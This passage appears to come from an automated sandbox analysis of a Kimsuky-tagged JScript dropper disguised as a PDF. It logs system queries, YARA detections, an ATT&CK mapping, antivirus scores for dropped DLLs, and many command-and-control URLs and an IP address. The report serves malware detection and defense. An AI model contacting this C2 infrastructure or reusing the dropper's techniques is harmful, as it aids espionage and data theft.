Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\3AED.tmp VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\8848.tmp VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DD79B0 cpuid

13_2_00007FF983DD79B0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DE31F8 GetSystemTimeAsFileTime,

13_2_00007FF983DE31F8

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DD1318 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

13_2_00007FF983DD1318

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983D91290 GetVersion,GetNativeSystemInfo,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

13_2_00007FF983D91290

Stealing of Sensitive Information:

Yara detected Kimsuky

Show sources

Source: Yara match	File source: 24.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.7ff983d90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Kimsuky

Show sources

Source: Yara match	File source: 24.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.7ff983d90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Scripting221	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	OS Credential Dumping	System Time Discovery2	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Scripting221	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell2	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Obfuscated Files or Information121	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Data Encoding1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection111	Software Packing1	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading111	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion31	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Virtualization/Sandbox Evasion31	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection111	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	12%	Virustotal		Browse
x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	11%	ReversingLabs	Script.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll	32%	Metadefender		Browse
C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll	68%	ReversingLabs	Win64.Spyware.Xegumumune
C:\ProgramData\glK7UwV.pR9a	32%	Metadefender		Browse
C:\ProgramData\glK7UwV.pR9a	68%	ReversingLabs	Win64.Spyware.Xegumumune

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
texts.letterpaper.press	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://texts.letterpaper.press//?m=c&p1=8ace1190SL	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190db;M	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190xt	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69%	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190PO	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM5	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190iM	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69;	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190HN	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190b(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190A(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190YC	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.695	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.694	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69G	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69M	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69L	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190G~	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190uN&	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190QN	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Y	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69W	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190AC	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190bm~5	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190bK	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190bO	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69O	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69U	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69i	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190O$	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace11902M)	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190b7	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190wP	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69k	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190fb	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190#~	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69e	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190O-	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190bK	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190FN	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190v~	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190gM	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69z	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190Mt	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69q	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69n	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190_M	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190bK6(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190Et	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190%	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190&	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190bJ(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace11906L	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190=t	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190bKy(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190lN/	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace11905t	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190&M	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190?L	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190b$(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190csi	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190qB	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190I	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190KP7	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190J	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190K	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190mC	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLb	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190sMh	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190B	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190K8(	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190LM	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190?	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190db	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190lO)	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190v	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190y	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190x	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace11906	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190z	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190pLk	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190o	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace11902	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190n	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=c&p1=8ace1190	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190q	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190p	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBm	0%	Avira URL Cloud	safe
http://texts.letterpaper.press//?m=d&p1=8ace1190bt75	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
texts.letterpaper.press	50.17.5.224	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://texts.letterpaper.press//?m=c&p1=8ace1190SL	regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190db;M	regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190xt	regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69%	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190PO	regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM5	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190iM	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69;	regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190HN	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190b(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190A(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190YC	regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.695	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.694	regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69G	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
